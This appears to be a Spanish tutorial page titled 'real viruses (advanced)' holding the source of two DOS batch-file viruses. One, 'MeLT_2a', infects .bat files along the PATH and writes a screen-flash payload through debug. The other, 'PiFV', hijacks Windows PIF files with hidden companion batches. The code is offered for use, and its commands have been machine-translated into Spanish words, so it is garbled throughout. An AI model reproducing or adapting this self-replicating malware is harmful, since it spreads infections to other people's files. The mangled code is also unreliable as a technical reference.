Paso 2: Virus reales (avanzados)
1. el más poderoso*******************
no ' 0% ==' si ' % _melt % ==' goto meltbeg
::---maniquí host---
de
echo Hola mundo!
::---host simulado final---
MeLTend [MeLT_2a]
: MeLTbeg
% _MeLT %
Si ' %1 ==' goto derretimiento derretir 2%
Si no existe % comspec % set comspec = % _MeLT % comando
/ c % comspec % /e:5000 %0 Vir del derretimiento
Set MeLTcl = %1 %2 %3 %4 %6 %7 %8 %9 de %5
Llame a %0 Rh del derretimiento
Set _MeLT =
Set MeLTcl =
Goto MeLTend
: MeLTrh
Set _MeLT = x
%0% MeLTcl %
: MeLTvir
Set MeLTH = 0%
Si no existe %_MeLT%%temp%\nul set temp = % tmp %
Si existen %temp%\MeLT_2a goto MeLTrun
%0 Derretir la fnd. % path %
: MeLTfnd
cambio % _MeLT %
Si ' %2 ==' salida del derretimiento
Set MeLT=%2\%MeLTH%.bat
Si no existe fusión % set MeLT=%2\%MeLTH%
Si no existe fusión % set MeLT=%2%MeLTH%.bat
Si no existe fusión % set fusión = %2% MeLTH %
Si no existe fusión de % % goto MeLTfnd
encontrar "Derretimiento" < % fusión > %temp%\MeLT_2a
attrib %temp%\MeLT_2a + h
: MeLTrun
% MeLTH % s de derretimiento. .. % path %
: Se derrite
cambio % _MeLT %
Si ' %2 ==' salida del derretimiento
para % en (%2\*.bat % 2*.bat) llamar a % MeLTH % inf derretimiento % %
Goto derretimientos
: MeLTinf
buscar /i "Derretimiento" < %3 > nul
Si no errorlevel 1 goto MeLTno
echo no ' %% 0 ==' si ' %% _melt %% ==' goto meltbeg > MeLT.t
tipo %3 >> MeLT.t
echo. >> MeLT.t
tipo %temp%\MeLT_2a >> MeLT.t
mover MeLT.t %3 > nul
salida del derretimiento
: MeLTact - flash-derrite el texto de la pantalla y luego vuelva a la normalidad
echo e 100 BA D0 07 BB 00 B8 8E C3 8B CA 33 FF 26 8B 05 FE > MeLT.t
echo e 110 C0 C4 de FE 26 89 05 47 47 E8 E2 F2 FE 06 24 01 75 >> MeLT.t
echo e 120 B4 4 C CD 21 00 >> MeLT.t
Eco g >> MeLT.t
< MeLT.t > nul de depuración
del MeLT.t
salida del derretimiento
: MeLTno
Set MeLTC = % MeLTC %1
Si % MeLTC % == 1111111111 goto MeLTact
: MeLTend
*******************************************
2 se trata de un virus que infecta a los archivos PIF, utilizados por Windows para
ejecutar DOS programas. Funciona mediante la creación de compañero escondido lotes
que contienen copias de esto entonces alterar el archivo PIF para que la
lote de compañero funciona primero. Después de que el compañero corre corre el
original programa de host, el nombre del que está codificado en el
compañero. Los archivos pif están marcados para que no sean
re-infected. Sólo PIF es afectados, no se realizan cambios a
los programas infectados. Para 'curar', utilizar PIFEDIT para restaurar la
nombres de archivo originales entonces borre los archivos ocultos.
**********************************************
de
:: archivo de host...
Set pifvo=LIST.COM
:: despachador de lazo...
Si ' %1 ==' goto PiFV PiFV_ 2%
:: ejecutar el virus!
Set _PiFV =
Si no existe % comspec % set comspec=C:\COMMAND.COM%_PiFV%
/ c % comspec % /e:5000 %0 PiFV ir > nul
Si existen PiFV! del PiFV!
:: ejecutar el host
Set PiFVcl = %1 %2 %3 %4 %6 %7 %8 %9 de %5
Llame a %0 Hst PiFV
Set PiFVo =
Set PiFVcl =
:: Compruebe para la activación...
echo. | Date|Find /i "sat" > nul. PiFV
Si errorlevel 1 goto PiFV_end
echo. | Time|Find "7" > nul. PiFV
Si errorlevel 1 goto PiFV_msg
Set PiFV = eco
CLS % _PiFV %
% PiFV %.
% PiFV % allí fue una vez una nutria llamada Oscer
% PiFV % que afirma saber cómo hacer que el agua.
% PiFV % "No más represas", dijo, "uso de mi agua!"
% PiFV % pero la nutria Elder no quedó impresionado.
PAUSE > nul. PiFV
Set PiFV =
Goto PiFV_end
: PiFV_msg
echo [PiFV] por WaveFunc
Goto PiFV_end
: PiFV_hst
% PiFVo % % PiFVcl %
Goto PiFV_end
: PiFV_go
Set PiFVh = 0%
Si no existe sistema de % PiFVh % PiFVh=%0.bat
Si no existe salida de % PiFVh %
para % en (*.pif) llamada %0 Inf PiFV Condition
salida PiFV
: PiFV_inf
Set PiFVp = 3%
:: conseguir víctima marcador de nombre de archivo y la infección
:: de archivo PIF mediante depuración...
Si existen PiFV! Goto PiFV_1
echo m 124.162 524 > PiFV!
echo e 100' fn =' >> PiFV!
echo m 524.562 108 >> PiFV!
echo pifv n $.bat >> PiFV!
Eco de rcx >> PiFV!
Eco de 47 >> PiFV!
Eco w >> PiFV!
echo m 55E, 561 108 >> PiFV!
echo e 10C 0 >> PiFV!
echo pifv n $$ .bat >> PiFV!
Eco de rcx >> PiFV!
echo 10 >> PiFV!
Eco w >> PiFV!
echo q >> PiFV!
: PiFV_1
depuración de % PiFVp % < PiFV! > nul
llamar al PiFV$
Set PiFVn = fn %
llamar al PiFV$ $
Set PiFVi = fn %
del PiFV$?. Murciélago
:: pifvn = archivo de orig
:: pifvi = marcador de infección
:: pifvp = nombre del archivo pif
:: pifvh = compañero bat archivo
:: saltar FIPS infectados o 'vacío'...
Si ' % PiFVi % ==' goto PiFV PiFV_end
Si ' % PiFVn % ==' goto PiFV_end
:: no sombra command.com (estaría bien)
echo % PiFVn % |find /i "comando" > nul
Si no errorlevel 1 goto PiFV_end
:: los - crear un lote de compañero...
:: (el siguiente código de las tiras de la extensión)
echo e 100 e8 16 00 b4 08 cd 21 3c 00 74 0c 3C 2e 74 08 88 > PiFV$
Eco e 110 c2 b4 02 cd 21 eb ec cd 20 ba 21 01 b4 cd 09 21 >> PiFV$ $
echo e 120 c3 73 65 74 20 66 6e 3d 24 00 >> PiFV$ $
echo pifv n $.com >> PiFV$ $
Eco de rcx >> PiFV$ $
Eco de 2a >> PiFV$ $
Eco w >> PiFV$ $
echo q >> PiFV$ $
depurar < PiFV$ $> nul
echo % PiFVn % |PiFV$ > PiFV$ $.bat
llamar al PiFV$ $
Set PiFVb=%fn%.bat
del PiFV$?. *
:: pifvb = nuevo nombre
:: la sombra no si comp tiene el mismo nombre como anfitrión
Si % PiFVo % == % PiFVb % goto PiFV_end
Si existen % PiFVb % goto PiFV_end
echo off > % PiFVb %
Eco establece pifvo = % pifvn % >> % PiFVb %
Buscar "PiFV" < % PiFVh % >> % PiFVb %
% PiFVb % de attrib + h
::.. .y punto el PIF en el compañero
echo e 15E 'PiFV', 0 > PiFV$
echo e 124 'PiFVb %' 0 >> PiFV$ $
Eco w >> PiFV$ $
echo q >> PiFV$ $
depuración de % PiFVp % < PiFV$ $> nul
del PiFV$ $
:: Creo que hemos terminado!
salida PiFV
: PiFV_end
¿:: pregunto cuántos errores todo lo que esto tiene en ella? Sólo uno
:: manera de averiguar...
***************************************************